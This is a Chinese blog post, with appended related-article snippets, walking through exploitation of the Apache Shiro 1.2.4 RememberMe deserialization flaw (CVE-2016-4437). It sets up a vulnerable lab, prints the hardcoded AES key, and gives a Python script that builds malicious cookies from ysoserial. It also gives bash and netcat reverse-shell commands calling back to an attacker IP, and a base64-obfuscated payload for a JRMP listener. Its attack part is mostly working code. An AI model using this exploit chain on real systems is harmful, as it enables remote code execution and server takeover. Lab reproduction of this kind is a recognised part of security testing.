php5.5 反序列化利用工具_【漏洞复现】Shiro RememberMe 1.2.4 反序列化命令执行漏洞...

最新推荐文章于 2022-11-06 18:54:37 发布
最新推荐文章于 2022-11-06 18:54:37 发布
阅读量423 收藏
点赞数
文章标签: php5.5 反序列化利用工具 shiro反序列化工具 shiro反序列化检测工具 shiro反序列化漏洞修复

0x00 影响版本

Apache Shiro <= 1.2.4

0x01 原因分析

    Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值 >  Base64解码–>AES解密–>反序列化。然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。

AES加密

    勾选记住密码并登录页面上的账号密码,成功登录后台后返回Cookie中的rememberMe值为固定的512位。

576a41827a11987b629328aa5c401134.png

7704621efef34eb6aa418ff9870e0306.png

    从官方文档中,我们知道在Shiro配置类中加入rememberMe管理器代码中写到cookie加密密钥默认为AES算法并且密钥为2AvVhdsgUs0FSA3SDFAdag==

16269989c64729ebda6b2f8402007bdb.png

    接着进行AES加密。动态跟踪到AbstractRememberMeManager类的encrypt方法中,可以看到AES的模式为AES/CBC/PKCS5Padding,并且AES的key为Base64.decode("kPH+bIxk5D2deZiIxcaaaA=="),转换为16进制后是\x90\xf1\xfe\x6c\x8c\x64\xe4\x3d\x9d\x79\x98\x88\xc5\xc6\x9a\x68,key为16字节,128位。

8697632014f5d6f4a4c1be686ee05459.png

    进行AES加密,利用arraycopy()方法将随机的16字节IV放到序列化后的数据前面,完成后再进行AES加密。

    最后在CookieRememberMeManager类的rememberSerializedIdentity()方法中进行base64加密:

3853c3d7ec0252f602ee6c674cb5b535.png

0x02 环境搭建

    到Github获取Apache Shiro 1.2.4版本 源文件

 git clone https://github.com/apache/shiro.gitgit checkout shiro-root-1.2.4cd ./shiro/samples/web

    为了配合生成反序列化的漏洞环境,需要添加存在漏洞的 jar 包,编辑 pom.xml文件,添加如下行:

              1.6        1.6    ...                        javax.servlet            jstl                        1.2            runtime        .....                    org.apache.commons            commons-collections4            4.0      

    修改完成后,使用Maven 把存在漏洞环境 war包进行编译

    最终可以将 target 目录下生成的 samples-web-1.2.4.war 文件拷贝至 tomcat 目录下的 webapps 目录,这里将其重命名为了 shiro.war 文件,启动 tomcat, 在浏览器当中输入

http://localhost:80/ 可以看到登录页面,如下图:

11fca06802a26de55bf14c4a17e7b0cd.png

    然后,获取我们复现需要用到的ysoserial工具

git clone https://github.com/frohoff/ysoserial.gitcd ysoserialmvn package -DskipTests

    生成的工具在target/目录下ysoserial-0.0.6-SNAPSHOT-all.jar文件

0x03 漏洞利用

    恶意 Cookie rememberMe值构造

前16字节的密钥–>后面加入序列化参数–>AES加密–>base64编码–>发送cookie

    生成恶意rememberMe参数值Python代码

python PopX.py 攻击者IP:PORT

 import sysimport uuidimport base64import subprocessfrom Crypto.Cipher import AES

 def encode_rememberme(command): #ysoserial-0.0.6-SNAPSHOT-all.jar #文件需要在该文件目录

    popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE)   BS = AES.block_size   pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()   key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")   iv = uuid.uuid4().bytes   encryptor = AES.new(key, AES.MODE_CBC, iv)   file_body = pad(popen.stdout.read())   base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))   return base64_ciphertextif __name__ == '__main__':   payload = encode_rememberme(sys.argv[1])print "rememberMe={0}".format(payload.decode())

0843e955305ae7a8a56503327d4f768b.png

接下来制作反弹shell代码

 bash -i >& /dev/tcp/192.168.1.2/8888 0>&1

然后进行Java反序列化绕过 base64编码

http://www.jackson-t.ca/runtime-exec-payloads.html

4c1b3b757b1b930e925185f1ad53fcb9.png

    再使用ysoserial中JRMP监听模块,监听3888端口注意这里的端口是刚才生成rememberMe值的端口。再加上生成的base64编码。

 java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 3888 CommonsCollections5 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMi84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}}'

4404e61497f5bc16bf7b17de21ae5e4a.png

0x04 命令执行

    将使用PopX.py脚本生成的Cookie带入Cookie请求中即连接成功反弹Shell。

84238f6280a1dd1475ac470aa51889e4.png

这里会收到请求数据再而远程执行命令

2b8bcb839fd8d46b3e0c7ff0c131fd05.png

监听端口也收到反弹Shell

1f130cd2a2155237737066b96109a2ea.png

0x05 漏洞修复

    目前官方发布了最新版本 ,强烈建议您更新并使用最新版本。

weixin_39619433
关注
Apache Shiro 1.2.4反序列化漏洞(Shiro-550)--Shiro rememberMe反序列化漏洞(CVE-2016-4437)
薛定谔嘚喵博客
05-10 1648
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令
shrio反序列漏洞修复_GitHub - Ethancck/ShiroScan: Shiro RememberMe 1.2.4 反序列化漏洞图形化检测工具(Shiro-550)...
weixin_30865253的博客
01-17 998
Shiro反序列化检测工具ShiroScan用于检测存在Shiro反序列化漏洞的key值。有三种方式进行检测,第一种是利用URLDNS进行检测,第二种利用命令执行进行检测,第三种使用SimplePrincipalCollection序列化后进行检测(XCheck,即Xray Check)。功能简介默认DNSLOG选择后会调用dnslog.cn的接口,生成一个域名,进行检测后,结果会输出在结果区域。...
Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现
偷一个月亮
12-23 6705
环境搭建 漏洞测试 抓包测试 查看返回包里setcookie有rememberme的字样 继续测试 首先最简单的测试方法是用dnslog,看看是否有回显。 利用密钥生成rememberMe dns发现有回显,说明存在反序列化漏洞漏洞复现 1.监听回弹shell 2.生成key 3.使用ysoserial中JRMP监听模块,监听9920端口 4.重放 5.收到返回shell...
Apache Shiro RememberMe 1.2.4 反序列化过程命令执行漏洞【原理扫描】
Gblfy_Blog
12-06 4384
文章目录一、分析定位1. 漏洞描述2. 项目引发漏洞简述二、解决方案2.1. 若依系统2.2. Gus系统 一、分析定位 1. 漏洞描述 目前厂商已经发布了新版本修复这个安全问题,请到厂商的主页下载: https://issues.apache.org/jira/browse/SHIRO-550 https://shiro.apache.org/download.html 2. 项目引发漏洞简述 若依/Guns管理系统使用了Apache ShiroShiro 提供了记住我(RememberM
shiro反序列化漏洞利用工具
11-09
图形化界面,该工具支持漏洞检测,请勿用作非法途径,否则后果自负。 Shiro550无需提供rememberMe Cookie,Shiro721需要提供一个有效的rememberMe Cookie 可以手工指定特定的 Key/Gadget/EchoType(支持多选),如果不指定会遍历所有的 Key/Gadget/EchoType 复杂Http请求支持直接粘贴数据包 pic1
Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现 kali docker
mohanhan
06-23 2456
Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现漏洞环境搭建漏洞复现反弹shell题外话1题外话2 影响版本:Apache Shiro <= 1.2.4 漏洞产生原因: shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化。 然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。使用大佬脚本生成 payl
ShiroScan:Shiro RememberMe 1.2.4反序列化入侵图形化检测工具Shiro-550)
03-18
Shiro反序列化检测工具 ShiroScan用于检测存在四郎反序列化漏洞的关键值。有三种方式进行检测,第一种是利用URLDNS进行检测,第二种利用命令执行进行检测,第三种使用SimplePrincipalCollection序列化后进行检测...
Shiro反序列化漏洞Shiro版本升级资源
06-22
shiro使用的版本是1.2.4,存在反序列化漏洞,我们采取的办法是手动升级到了1.2.6版本,但苦于无法验证是否解决了问题,后来发现了一款测试工具ShiroExploit。 测试工具下载地址 ... 反序列化漏洞是如何产生的?...
SHIRO-550:Shiro RememberMe 1.2.4反序列化突破
03-10
Shiro RememberMe 1.2.4反序列化突破(SHIRO-550) commons-collections-3.2.1.jar java -jar ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient "10.10.20.166:12345" |python exp.py java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 'nc -e /bin/sh 192.168.5.86 8989' nc -nlvp 8989 python用法: python3 shiro_rce.py _____ _ _ _____ _____ ____ _____ _____ __
shiro远程命令执行漏洞检测工具.zip
11-15
shiro远程命令执行漏洞检测工具:包括了shiro_attack_2.2和ShiroExploit.V2.51,大家可根据需要自行下载
Shiroexploit:Shiro命令执行工具
03-31
雷石安全实验室出品 Shiro命令执行工具V2.0 内置shiro 117个键 支持dnslog(ceye.io)查询检测,增加准确性 / *支持攻击利用。支持密钥与小工具自定义* / Shiro命令执行工具 V1.0提供默认的键的查询 摘取xray高级版xray利用链 100+个键已注释!!!!
漏洞复现系列--Shiro RememberMe 1.2.4 反序列化漏洞
梦之旅行地
02-05 2630
1、漏洞利用前提: Apache Shiro <= 1.2.4 2、靶场: 利用vulhub的靶场在服务器上搭建 注:docker相关配置就没有写了,靶场能运行就行 靶场搭建 git clone https://github.com/vulhub/vulhub.git cd /vulhub/shiro/CVE-2016-4437 docker-compose up -d #启动靶场 启...
Web安全 PHP反序列化漏洞的 测试.(可以 防止恶意用户利用漏洞
网络安全领域___专研者.
03-25 4573
PHP反序列化漏洞的 概括: 开发的程序员 没有对用户输入的序列化字符串做一个严格检测,导致恶意的用户可以控制反序列化的一个过程,因此导致XSS漏洞,代码执行,SQT注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。在进行反序列化的时候就有可能触发对象中的一些魔术方法。
反序列化漏洞利用工具_深入理解PHP Phar反序列化漏洞原理及利用方法(一)
weixin_39939530的博客
12-10 529
概述Phar反序列化漏洞是一种较新的攻击向量,用于针对面向对象的PHP应用程序执行代码重用攻击,该攻击方式在Black Hat 2018会议上由安全研究员Sam Thomas公开披露。类似于对编译二进制文件的ROP(Return-oriented Programming)攻击,这种类型的漏洞利用PHP对象注入(POI),这是面向对象的PHP代码上下文中的一种面向属性的编程(POP)。由...
php反序列化漏洞扫描,浅析php反序列化漏洞
weixin_39631667的博客
03-28 294
反序列化在很多语言中都比较常见,下面简单介绍php反序列化漏洞(对象注入)。0x00.是什么——whatphp反序列化漏洞,又叫对象注入。涉及到的是php中的两个函数:unsearialize()与serialize()。后者为将一个对象或者数组转换为字符串以便保存,前者则将尝试将字符串恢复为对象或者数组。关于这个漏洞大家平时可能很少见,它的触发点主要是在代码审计中cms的session序列化与...
PHP反序列化漏洞
weixin_41489908的博客
08-07 251
以前我觉得成绩不重要,清华北大只能代表学生时代的成就,后来才发现,努力是种习惯,他会贯穿一生。。。 ---- 网易云热评 一、创建类和对象 <?php #创建一个Jay专辑类 class Jay{ public $name; public $year; public $mus; } #创建一个Jay专辑对象 $jay1 =new Jay(); #专辑名称 $jay1->name="周杰伦的床边故事"; #专辑发行时间 $jay1-&...
java反序列化漏洞利用工具_PHP反序列化漏洞说明
weixin_39904116的博客
11-14 243
序列化PHP程序为了保存和转储对象,提供了序列化的方法,序列化是为了在程序运行的过程中对对象进行转储而产生的。序列化可以将对象转换成字符串,但仅保留对象里的成员变量,不保留函数方法。PHP序列化的函数为serialize,反序列化的函数为unserialize.举个栗子:...
Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)
m0_61506558的博客
11-06 2590
关于shiro在2019年爆出来的漏洞利用的条件相对来说比较苛刻,不仅要有一定的权限登入进去,进去之后密钥爆破也不一定可以成功,环境不好搭建,感兴趣的师傅可以看看,本篇文章介绍的是有关shiro反序列化漏洞,(一)基本介绍。
shiro反序列化检测工具
最新发布
07-29
\[1\]根据博文中的描述,shiro版本<=1.2.4存在反序列化漏洞,其产生的原因是参数rememberMe存在硬编码,导致AES的Key也是硬编码,从而使得反序列化漏洞产生。\[2\]而升级到1.2.6版本后,通过使用ShiroExploit工具...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值